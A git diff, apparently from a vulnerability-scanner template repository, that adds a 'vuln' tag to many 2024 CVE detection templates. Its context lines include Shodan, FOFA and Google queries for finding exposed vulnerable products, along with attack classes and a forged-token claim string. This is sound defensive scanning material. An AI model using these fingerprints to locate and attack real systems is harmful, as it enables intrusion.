a62ec5a6c1d..dc059ec07c2 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -24,7 +24,7 @@ info: publicwww-query: "/wp-content/plugins/learnpress" product: learnpress vendor: thimpress - tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress,vkev + tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress,vkev,vuln variables: num: "{{rand_int(10000, 99999)}}" diff --git a/http/cves/2024/CVE-2024-44349.yaml b/http/cves/2024/CVE-2024-44349.yaml index 843da61a982..596784e63fd 100644 --- a/http/cves/2024/CVE-2024-44349.yaml +++ b/http/cves/2024/CVE-2024-44349.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 2 shodan-query: html:"ANTEEO" - tags: cve,cve2024,sqli,anteeowms + tags: cve,cve2024,sqli,anteeowms,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4439.yaml b/http/cves/2024/CVE-2024-4439.yaml index b8ce6b35e3f..de7b519bffc 100644 --- a/http/cves/2024/CVE-2024-4439.yaml +++ b/http/cves/2024/CVE-2024-4439.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 10 framework: wordpress - tags: wpscan,xss,wp,wordpress,footnote,sxss,post + tags: wpscan,xss,wp,wordpress,footnote,sxss,post,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index 9dce863d6c6..e3054dd1454 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -28,7 +28,7 @@ info: publicwww-query: "/wp-content/plugins/business-directory-plugin/" product: business_directory vendor: businessdirectoryplugin - tags: time-based-sqli,cve,cve2024,sqli,business-directory,wordpress,wp-plugin + tags: time-based-sqli,cve,cve2024,sqli,business-directory,wordpress,wp-plugin,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-44762.yaml b/http/cves/2024/CVE-2024-44762.yaml index f808a3159bd..1817f2f698e 100644 --- a/http/cves/2024/CVE-2024-44762.yaml +++ b/http/cves/2024/CVE-2024-44762.yaml @@ -27,7 +27,7 @@ info: product: usermin shodan-query: title:"Usermin" fofa-query: app="Usermin" - tags: cve,cve2024,usermin,webmin,exposure,usernames + tags: cve,cve2024,usermin,webmin,exposure,usernames,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-44849.yaml b/http/cves/2024/CVE-2024-44849.yaml index ca6223e1caf..48d99224c73 100644 --- a/http/cves/2024/CVE-2024-44849.yaml +++ b/http/cves/2024/CVE-2024-44849.yaml @@ -25,7 +25,7 @@ info: vendor: qualitor product: qualitor fofa-query: "Qualitor" - tags: cve,cve2024,rce,file-upload,qualitor,intrusive,vkev + tags: cve,cve2024,rce,file-upload,qualitor,intrusive,vkev,vuln variables: filename: "{{rand_base(12)}}" diff --git a/http/cves/2024/CVE-2024-45195.yaml b/http/cves/2024/CVE-2024-45195.yaml index 91f9563db26..5de3f780ffb 100644 --- a/http/cves/2024/CVE-2024-45195.yaml +++ b/http/cves/2024/CVE-2024-45195.yaml @@ -29,7 +29,7 @@ info: fofa-query: - app="apache_ofbiz" - body="ofbiz" - tags: cve,cve2024,apache,ofbiz,rce,instrusive,kev,vkev + tags: cve,cve2024,apache,ofbiz,rce,instrusive,kev,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-45216.yaml b/http/cves/2024/CVE-2024-45216.yaml index c00e9c0e456..224662ef76f 100644 --- a/http/cves/2024/CVE-2024-45216.yaml +++ b/http/cves/2024/CVE-2024-45216.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Apache Solr" - tags: cve,cve2024,apache,solr,auth-bypass + tags: cve,cve2024,apache,solr,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-45241.yaml b/http/cves/2024/CVE-2024-45241.yaml index c8bef13b18c..e5d163ab417 100644 --- a/http/cves/2024/CVE-2024-45241.yaml +++ b/http/cves/2024/CVE-2024-45241.yaml @@ -23,7 +23,7 @@ info: vendor: centralsquare product: crywolf fofa-query: "False Alarm Reduction Website" - tags: cve,cve2024,lfi,centralsquare,crywolf + tags: cve,cve2024,lfi,centralsquare,crywolf,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-45293.yaml b/http/cves/2024/CVE-2024-45293.yaml index 66c47bece20..28749a2f4d0 100644 --- a/http/cves/2024/CVE-2024-45293.yaml +++ b/http/cves/2024/CVE-2024-45293.yaml @@ -30,7 +30,7 @@ info: product: tablepress fofa-query: body="/wp-content/plugins/tablepress" google-query: inurl:"/wp-content/plugins/tablepress" - tags: cve2024,cve,tablepress,wp,wp-plugin,wordpress,xxe,intrusive + tags: cve2024,cve,tablepress,wp,wp-plugin,wordpress,xxe,intrusive,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-45309.yaml b/http/cves/2024/CVE-2024-45309.yaml index 9b187122fc9..ec35d8c8ab0 100644 --- a/http/cves/2024/CVE-2024-45309.yaml +++ b/http/cves/2024/CVE-2024-45309.yaml @@ -29,7 +29,7 @@ info: shodan-query: html:"onedev.io" product: onedev framework: java - tags: cve,cve2024,lfi,onedev + tags: cve,cve2024,lfi,onedev,vuln flow: | http(1) diff --git a/http/cves/2024/CVE-2024-45388.yaml b/http/cves/2024/CVE-2024-45388.yaml index ea08c989372..f0484c7b510 100644 --- a/http/cves/2024/CVE-2024-45388.yaml +++ b/http/cves/2024/CVE-2024-45388.yaml @@ -20,7 +20,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:1357234275 - tags: cve,cve2024,hoverfly,lfi,intrusive,vkev + tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-45440.yaml b/http/cves/2024/CVE-2024-45440.yaml index fab805cdcc2..c1a4ff237b8 100644 --- a/http/cves/2024/CVE-2024-45440.yaml +++ b/http/cves/2024/CVE-2024-45440.yaml @@ -25,7 +25,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2024,drupal,exposure,error + tags: cve,cve2024,drupal,exposure,error,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-45488.yaml b/http/cves/2024/CVE-2024-45488.yaml index da11a0c5998..08dac12f56e 100644 --- a/http/cves/2024/CVE-2024-45488.yaml +++ b/http/cves/2024/CVE-2024-45488.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: html:"Safeguard for Privileged Passwords" - tags: cve,cve2024,auth-bypass,safeguard + tags: cve,cve2024,auth-bypass,safeguard,vuln code: - engine: - py diff --git a/http/cves/2024/CVE-2024-45507.yaml b/http/cves/2024/CVE-2024-45507.yaml index fc38a60a059..060618461ab 100644 --- a/http/cves/2024/CVE-2024-45507.yaml +++ b/http/cves/2024/CVE-2024-45507.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="apache_ofbiz" - body="ofbiz" - tags: cve,cve2024,apache,obiz,rce,oast,vkev + tags: cve,cve2024,apache,obiz,rce,oast,vkev,vuln variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2024/CVE-2024-45591.yaml b/http/cves/2024/CVE-2024-45591.yaml index 583583d3450..9204a1c64b2 100644 --- a/http/cves/2024/CVE-2024-45591.yaml +++ b/http/cves/2024/CVE-2024-45591.yaml @@ -28,7 +28,7 @@ info: vendor: xwiki product: xwiki-platform shodan-query: http.html:"data-xwiki-reference" - tags: cve,cve2024,xwiki,exposure,rest-api + tags: cve,cve2024,xwiki,exposure,rest-api,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-45622.yaml b/http/cves/2024/CVE-2024-45622.yaml index bbceba16647..09aef86ea7f 100644 --- a/http/cves/2024/CVE-2024-45622.yaml +++ b/http/cves/2024/CVE-2024-45622.yaml @@ -24,7 +24,7 @@ info: vendor: asis product: asis google-query: "ASIS | Aplikasi Sistem Sekolah" - tags: cve,cve2024,asis,auth-bypass,sqli + tags: cve,cve2024,asis,auth-bypass,sqli,vuln variables: pass: "{{rand_base(10)}}" diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 862b55898f1..7a3401c6722 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -35,7 +35,7 @@ info: - x-powered-by:"php" fofa-query: title="php warning" || "fatal error" google-query: intitle:"php warning" || "fatal error" - tags: cve,cve2024,php,cgi,rce,kev,vkev + tags: cve,cve2024,php,cgi,rce,kev,vkev,vuln http: - method: POST diff --git a/http/cves/2024/CVE-2024-4620.yaml b/http/cves/2024/CVE-2024-4620.yaml index ac98fed25e8..6b1780252c2 100644 --- a/http/cves/2024/CVE-2024-4620.yaml +++ b/http/cves/2024/CVE-2024-4620.yaml @@ -21,7 +21,7 @@ info: framework: wordpress verified: true max-request: 3 - tags: cve,cve2024,wordpress,wp,wp-plugin,arforms,intrusive,vkev + tags: cve,cve2024,wordpress,wp,wp-plugin,arforms,intrusive,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-46310.yaml b/http/cves/2024/CVE-2024-46310.yaml index b1e5412e72e..bbf69cba116 100644 --- a/http/cves/2024/CVE-2024-46310.yaml +++ b/http/cves/2024/CVE-2024-46310.yaml @@ -18,7 +18,7 @@ info: max-request: 1 vendor: fxserver product: fxserver - tags: cve,cve2024,fxserver,info-leak + tags: cve,cve2024,fxserver,info-leak,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-46506.yaml b/http/cves/2024/CVE-2024-46506.yaml index d6f02868915..d769f5e00f9 100644 --- a/http/cves/2024/CVE-2024-46506.yaml +++ b/http/cves/2024/CVE-2024-46506.yaml @@ -19,7 +19,7 @@ info: fofa-query: title="netalertx" vendor: netalertx product: netalertx - tags: cve,cve2024,netalertx,rce,intrusive,vkev + tags: cve,cve2024,netalertx,rce,intrusive,vkev,vuln variables: marker: "{{to_lower(rand_base(6))}}" diff --git a/http/cves/2024/CVE-2024-46507.yaml b/http/cves/2024/CVE-2024-46507.yaml index e4be85cd416..4183067de85 100644 --- a/http/cves/2024/CVE-2024-46507.yaml +++ b/http/cves/2024/CVE-2024-46507.yaml @@ -16,7 +16,7 @@ info: shodan-query: html:"Yeti" verified: true max-request: 4 - tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev + tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-46627.yaml b/http/cves/2024/CVE-2024-46627.yaml index ccaec5a2f4f..1e2cc8f3992 100644 --- a/http/cves/2024/CVE-2024-46627.yaml +++ b/http/cves/2024/CVE-2024-46627.yaml @@ -27,7 +27,7 @@ info: vendor: becon product: datagerry shodan-query: http.title:"datagerry" - tags: cve,cve2024,becon,datagerry,unauth,auth-bypass + tags: cve,cve2024,becon,datagerry,unauth,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-46938.yaml b/http/cves/2024/CVE-2024-46938.yaml index 19f03f4aa46..5b05f8c6bd4 100644 --- a/http/cves/2024/CVE-2024-46938.yaml +++ b/http/cves/2024/CVE-2024-46938.yaml @@ -24,7 +24,7 @@ info: shodan-query: http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" - tags: cve,cve2024,sitecore,lfi,rce,vkev + tags: cve,cve2024,sitecore,lfi,rce,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-46986.yaml b/http/cves/2024/CVE-2024-46986.yaml index a339e3c923e..80120cc6d44 100644 --- a/http/cves/2024/CVE-2024-46986.yaml +++ b/http/cves/2024/CVE-2024-46986.yaml @@ -27,7 +27,7 @@ info: product: camaleon_cms shodan-query: title:"Camaleon CMS" fofa-query: title="Camaleon CMS" - tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated + tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-47062.yaml b/http/cves/2024/CVE-2024-47062.yaml index cc6736ae801..509bdbe8a49 100644 --- a/http/cves/2024/CVE-2024-47062.yaml +++ b/http/cves/2024/CVE-2024-47062.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 2 shodan-query: html:"content="Navidrome"" - tags: cve,cve2024,sqli,orm-leak,navidrome,authenticated + tags: cve,cve2024,sqli,orm-leak,navidrome,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-47073.yaml b/http/cves/2024/CVE-2024-47073.yaml index 9cf857dab9b..5e8c2ed41d1 100644 --- a/http/cves/2024/CVE-2024-47073.yaml +++ b/http/cves/2024/CVE-2024-47073.yaml @@ -22,7 +22,7 @@ info: product: dataease shodan-query: http.html:"dataease" fofa-query: body="dataease" - tags: cve,cve2024,dataease,jwt + tags: cve,cve2024,dataease,jwt,vuln variables: payload: '{"uid":1,"oid":1,"exp":{{unix_time(1000)}}}' diff --git a/http/cves/2024/CVE-2024-47533.yaml b/http/cves/2024/CVE-2024-47533.yaml index 5a8ef0e60a1..c2bd55d0b47 100644 --- a/http/cves/2024/CVE-2024-47533.yaml +++ b/http/cves/2024/CVE-2024-47533.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Cobbler Web Interface" - tags: cve,cve2024,cobbler,auth-bypass,unauth,xmlrpc + tags: cve,cve2024,cobbler,auth-bypass,unauth,xmlrpc,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-48248.yaml b/http/cves/2024/CVE-2024-48248.yaml index c9e4cbe0bcb..bbd473da465 100644 --- a/http/cves/2024/CVE-2024-48248.yaml +++ b/http/cves/2024/CVE-2024-48248.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: title:"NAKIVO" fofa-query: title="NAKIVO" - tags: cve,cve2024,nakivo,backup,lfi,kev,vkev + tags: cve,cve2024,nakivo,backup,lfi,kev,vkev,vuln variables: string: "{{to_lower(rand_base(5))}}" diff --git a/http/cves/2024/CVE-2024-48307.yaml b/http/cves/2024/CVE-2024-48307.yaml index beb5e6fe868..9f20f55f8e1 100644 --- a/http/cves/2024/CVE-2024-48307.yaml +++ b/http/cves/2024/CVE-2024-48307.yaml @@ -27,7 +27,7 @@ info: - icon_hash=1380908726 - title="jeecg-boot" shodan-query: http.favicon.hash:"1380908726" - tags: cve2024,cve,jeecg,sqli,vkev + tags: cve2024,cve,jeecg,sqli,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2024/CVE-2024-4836.yaml b/http/cves/2024/CVE-2024-4836.yaml index 4251daed84f..9d6cd56040d 100644 --- a/http/cves/2024/CVE-2024-4836.yaml +++ b/http/cves/2024/CVE-2024-4836.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 5 fofa-query: icon_hash="1491301339" - tags: cve,cve2024,cms,edito,info-leak + tags: cve,cve2024,cms,edito,info-leak,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-48360.yaml b/http/cves/2024/CVE-2024-48360.yaml index e89d11ecd83..8c3efe607aa 100644 --- a/http/cves/2024/CVE-2024-48360.yaml +++ b/http/cves/2024/CVE-2024-48360.yaml @@ -23,7 +23,7 @@ info: vendor: qualitor product: qualitor fofa-query: icon_hash="-1217039701" - tags: cve,cve2024,ssrf,qualitor + tags: cve,cve2024,ssrf,qualitor,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4841.yaml b/http/cves/2024/CVE-2024-4841.yaml index 2b9ce4d0486..994fb548625 100644 --- a/http/cves/2024/CVE-2024-4841.yaml +++ b/http/cves/2024/CVE-2024-4841.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 fofa-query: "LoLLMS WebUI - Welcome" - tags: cve,cve2024,lollms-webui,traversal + tags: cve,cve2024,lollms-webui,traversal,vuln variables: folder: "{{to_upper(rand_text_alpha(10))}}" diff --git a/http/cves/2024/CVE-2024-48455.yaml b/http/cves/2024/CVE-2024-48455.yaml index 69d594ae2d2..9d03ff4afd4 100644 --- a/http/cves/2024/CVE-2024-48455.yaml +++ b/http/cves/2024/CVE-2024-48455.yaml @@ -20,7 +20,7 @@ info: metadata: max-request: 1 fofa-query: title="Netis" - tags: netis,router,exposure,vkev + tags: netis,router,exposure,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-48766.yaml b/http/cves/2024/CVE-2024-48766.yaml index 36c7f95212f..2cd46df912b 100644 --- a/http/cves/2024/CVE-2024-48766.yaml +++ b/http/cves/2024/CVE-2024-48766.yaml @@ -23,7 +23,7 @@ info: vendor: jokob-sk product: netalertx fofa-query: "NetAlert X" - tags: cve,cve2024,netalertx,lfi,vkev + tags: cve,cve2024,netalertx,lfi,vkev,vuln variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index f9cc7756b60..b7faed47777 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -26,7 +26,7 @@ info: - icon_hash=1701804003 - title="servicenow" google-query: intitle:"servicenow" - tags: cve,cve2024,servicenow,ssti,kev,vkev + tags: cve,cve2024,servicenow,ssti,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-4885.yaml b/http/cves/2024/CVE-2024-4885.yaml index e32913b5b94..a23df61b2f2 100644 --- a/http/cves/2024/CVE-2024-4885.yaml +++ b/http/cves/2024/CVE-2024-4885.yaml @@ -27,7 +27,7 @@ info: shodan-query: html:"WhatsUp Gold" product: whatsup_gold vendor: progress - tags: cve,cve2024,rce,progress,whatsup,lfi,kev,vkev + tags: cve,cve2024,rce,progress,whatsup,lfi,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-48914.yaml b/http/cves/2024/CVE-2024-48914.yaml index 25a3ea5f567..b36f4215e46 100644 --- a/http/cves/2024/CVE-2024-48914.yaml +++ b/http/cves/2024/CVE-2024-48914.yaml @@ -29,7 +29,7 @@ info: vendor: vendure-ecommerce product: vendure fofa-query: "Vendure" - tags: cve,cve2024,vendure,lfi,file-read,vkev + tags: cve,cve2024,vendure,lfi,file-read,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-4898.yaml b/http/cves/2024/CVE-2024-4898.yaml index eea1b38017c..604aef7d42b 100644 --- a/http/cves/2024/CVE-2024-4898.yaml +++ b/http/cves/2024/CVE-2024-4898.yaml @@ -27,7 +27,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/instawp-connect/" fofa-query: body="/wp-content/plugins/instawp-connect/" - tags: cve,cve2024,wp,wp-plugin,wordpress,instawp,intrusive,priv-esc,vkev + tags: cve,cve2024,wp,wp-plugin,wordpress,instawp,intrusive,priv-esc,vkev,vuln variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-49380.yaml b/http/cves/2024/CVE-2024-49380.yaml index 7b431ffe83f..2eae942f2fd 100644 --- a/http/cves/2024/CVE-2024-49380.yaml +++ b/http/cves/2024/CVE-2024-49380.yaml @@ -20,7 +20,7 @@ info: max-request: 2 verified: true shodan-query: title:"Plenti" - tags: cve,cve2024,plenti,rce,injection,intrusive + tags: cve,cve2024,plenti,rce,injection,intrusive,vuln variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-4940.yaml b/http/cves/2024/CVE-2024-4940.yaml index aff89ad90fd..6ae61522e99 100644 --- a/http/cves/2024/CVE-2024-4940.yaml +++ b/http/cves/2024/CVE-2024-4940.yaml @@ -27,7 +27,7 @@ info: - body="__gradio_mode__" - title="gradio" google-query: intitle:"gradio" - tags: cve,cve2024,redirect,oast,gradio + tags: cve,cve2024,redirect,oast,gradio,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 46a8f5518a2..8614fa6c701 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -27,7 +27,7 @@ info: fofa-query: - title="Nexus Repository Manager" - title="nexus repository manager" - tags: cve,cve2024,nexus,lfi,sonatype + tags: cve,cve2024,nexus,lfi,sonatype,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-49757.yaml b/http/cves/2024/CVE-2024-49757.yaml index 89d5e2a86ab..6930ff0f0fd 100644 --- a/http/cves/2024/CVE-2024-49757.yaml +++ b/http/cves/2024/CVE-2024-49757.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: title:"Zitadel" - tags: cve,cve2024,register,zitadel + tags: cve,cve2024,register,zitadel,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-50334.yaml b/http/cves/2024/CVE-2024-50334.yaml index 64ded4691c7..381cef51190 100644 --- a/http/cves/2024/CVE-2024-50334.yaml +++ b/http/cves/2024/CVE-2024-50334.yaml @@ -24,7 +24,7 @@ info: shodan-query: html:"scoold-wrapper" verified: true max-request: 1 - tags: cve,cve2024,scoold,info-leak,erudika,auth-bypass,vkev + tags: cve,cve2024,scoold,info-leak,erudika,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-50340.yaml b/http/cves/2024/CVE-2024-50340.yaml index c3b90898a43..28bf424ddd3 100644 --- a/http/cves/2024/CVE-2024-50340.yaml +++ b/http/cves/2024/CVE-2024-50340.yaml @@ -25,7 +25,7 @@ info: verified: true max-request: 1 fofa-query: 'body="
" || header="Set-Cookie: symfony"' - tags: cve,cve2024,symfony,phpinfo + tags: cve,cve2024,symfony,phpinfo,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-50477.yaml b/http/cves/2024/CVE-2024-50477.yaml index c08ece45205..17b3af1804a 100644 --- a/http/cves/2024/CVE-2024-50477.yaml +++ b/http/cves/2024/CVE-2024-50477.yaml @@ -25,7 +25,7 @@ info: vendor: stacks product: stacks_mobile_app_builder framework: wordpress - tags: cve,cve2024,wordpress,auth-bypass,account-takeover,wp-plugin,stacks + tags: cve,cve2024,wordpress,auth-bypass,account-takeover,wp-plugin,stacks,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-50498.yaml b/http/cves/2024/CVE-2024-50498.yaml index 2af84f1f852..3d61ca196af 100644 --- a/http/cves/2024/CVE-2024-50498.yaml +++ b/http/cves/2024/CVE-2024-50498.yaml @@ -26,7 +26,7 @@ info: product: wp_query_console framework: wordpress fofa-query: body="wp-content/plugins/wp-query-console/" - tags: cve,cve2024,wp,wordpress,wp-plugin,wp-query-console,rce,vkev + tags: cve,cve2024,wp,wordpress,wp-plugin,wp-query-console,rce,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-50603.yaml b/http/cves/2024/CVE-2024-50603.yaml index 13639f3b3cd..00a9ce34900 100644 --- a/http/cves/2024/CVE-2024-50603.yaml +++ b/http/cves/2024/CVE-2024-50603.yaml @@ -31,7 +31,7 @@ info: - title="aviatrix cloud controller" google-query: intitle:"aviatrix cloud controller" zoomeye-query: app="Aviatrix Controller" - tags: cve,cve2024,aviatrix,controller,rce,oast,kev,vkev + tags: cve,cve2024,aviatrix,controller,rce,oast,kev,vkev,vuln variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2024/CVE-2024-50623.yaml b/http/cves/2024/CVE-2024-50623.yaml index d1cf8b648f1..bf7e92f7042 100644 --- a/http/cves/2024/CVE-2024-50623.yaml +++ b/http/cves/2024/CVE-2024-50623.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 2 shodan-query: 'Server: Cleo' - tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev,vkev + tags: cve,cve2024,cleo,vltrader,lexicom,harmony,lfi,kev,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-5082.yaml b/http/cves/2024/CVE-2024-5082.yaml index a5bd5523159..543e623500f 100644 --- a/http/cves/2024/CVE-2024-5082.yaml +++ b/http/cves/2024/CVE-2024-5082.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 3 shodan-query: html:"Nexus Repository" - tags: cve,cve2024,intrusive,nexus,sonartype,vkev + tags: cve,cve2024,intrusive,nexus,sonartype,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-5084.yaml b/http/cves/2024/CVE-2024-5084.yaml index 56d43f726ca..92a30e93e12 100644 --- a/http/cves/2024/CVE-2024-5084.yaml +++ b/http/cves/2024/CVE-2024-5084.yaml @@ -24,7 +24,7 @@ info: product: Hash Form framework: wordpress publicwww-query: "/wp-content/plugins/hash-form/" - tags: cve,cve2024,wp-plugin,wordpress,file-upload,rce,intrusive + tags: cve,cve2024,wp-plugin,wordpress,file-upload,rce,intrusive,vuln variables: filename: "{{rand_base(5)}}" diff --git a/http/cves/2024/CVE-2024-50967.yaml b/http/cves/2024/CVE-2024-50967.yaml index 2ec6bd3ad01..00febef6f5e 100644 --- a/http/cves/2024/CVE-2024-50967.yaml +++ b/http/cves/2024/CVE-2024-50967.yaml @@ -23,7 +23,7 @@ info: shodan-query: http.title:"datagerry" fofa-query: title="datagerry" google-query: intitle:"datagerry" - tags: cve,cve2024,datagerry,auth-bypass,vkev + tags: cve,cve2024,datagerry,auth-bypass,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-51211.yaml b/http/cves/2024/CVE-2024-51211.yaml index 48a364046ce..68a15080749 100644 --- a/http/cves/2024/CVE-2024-51211.yaml +++ b/http/cves/2024/CVE-2024-51211.yaml @@ -21,7 +21,7 @@ info: max-request: 1 fofa-query: title="openSIS" shodan-query: title:"openSIS" - tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev + tags: cve,cve2024,sqli,opensis,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-51228.yaml b/http/cves/2024/CVE-2024-51228.yaml index 7a5b6e9d42d..151f61b202e 100644 --- a/http/cves/2024/CVE-2024-51228.yaml +++ b/http/cves/2024/CVE-2024-51228.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 shodan-query: html:"TOTOLINK" - tags: cve,cve2024,totolink,time-based-sqli,sqli + tags: cve,cve2024,totolink,time-based-sqli,sqli,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-51378.yaml b/http/cves/2024/CVE-2024-51378.yaml index 696590fa9a1..e63310df316 100644 --- a/http/cves/2024/CVE-2024-51378.yaml +++ b/http/cves/2024/CVE-2024-51378.yaml @@ -26,7 +26,7 @@ info: product: CyberPanel shodan-query: html:"CyberPanel" fofa-query: app="CyberPanel" - tags: cve,cve2024,cyberpanel,rce,kev,vkev + tags: cve,cve2024,cyberpanel,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-51482.yaml b/http/cves/2024/CVE-2024-51482.yaml index 42f023349a3..79d6f500fd5 100644 --- a/http/cves/2024/CVE-2024-51482.yaml +++ b/http/cves/2024/CVE-2024-51482.yaml @@ -23,7 +23,7 @@ info: vendor: zoneminder product: zoneminder shodan-query: title:"ZoneMinder" - tags: cve,cve2024,zoneminder,sqli,authenticated + tags: cve,cve2024,zoneminder,sqli,authenticated,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2024/CVE-2024-51483.yaml b/http/cves/2024/CVE-2024-51483.yaml index c095feb13d0..20ac1363b28 100644 --- a/http/cves/2024/CVE-2024-51483.yaml +++ b/http/cves/2024/CVE-2024-51483.yaml @@ -26,7 +26,7 @@ info: shodan-query: http.title:"change detection" fofa-query: title="change detection" google-query: intitle:"change detection" - tags: cve,cve2024,changedetection,lfi + tags: cve,cve2024,changedetection,lfi,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-51567.yaml b/http/cves/2024/CVE-2024-51567.yaml index 85e87290257..43d18974ab2 100644 --- a/http/cves/2024/CVE-2024-51567.yaml +++ b/http/cves/2024/CVE-2024-51567.yaml @@ -27,7 +27,7 @@ info: vendor: cyberpanel product: cyberpanel shodan-query: html:"CyberPanel" - tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev + tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-51568.yaml b/http/cves/2024/CVE-2024-51568.yaml index d6887951fcc..daae2c74a1e 100644 --- a/http/cves/2024/CVE-2024-51568.yaml +++ b/http/cves/2024/CVE-2024-51568.yaml @@ -24,7 +24,7 @@ info: vendor: cyberpanel product: cyberpanel shodan-query: http.html:"login to your cyberpanel account" - tags: cve,cve2024,cyberpanel,rce,intrusive,vkev + tags: cve,cve2024,cyberpanel,rce,intrusive,vkev,vuln variables: boundary: "{{to_lower(rand_base(9))}}" diff --git a/http/cves/2024/CVE-2024-51739.yaml b/http/cves/2024/CVE-2024-51739.yaml index e4bf107f8f3..5c312d670ee 100644 --- a/http/cves/2024/CVE-2024-51739.yaml +++ b/http/cves/2024/CVE-2024-51739.yaml @@ -24,7 +24,7 @@ info: product: itop shodan-query: http.html:" itop login" fofa-query: body=" itop login" - tags: cve,cve2024,itop,enum,unauth + tags: cve,cve2024,itop,enum,unauth,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-51977.yaml b/http/cves/2024/CVE-2024-51977.yaml index 42fd0513e42..8a22d0cbcc9 100644 --- a/http/cves/2024/CVE-2024-51977.yaml +++ b/http/cves/2024/CVE-2024-51977.yaml @@ -19,7 +19,7 @@ info: - app="brother-Printer" zoomeye-query: - device="brother-Printer" || app="brother-Printer" - tags: cve,cve2024,brother,mfc,printer,exposure,vkev + tags: 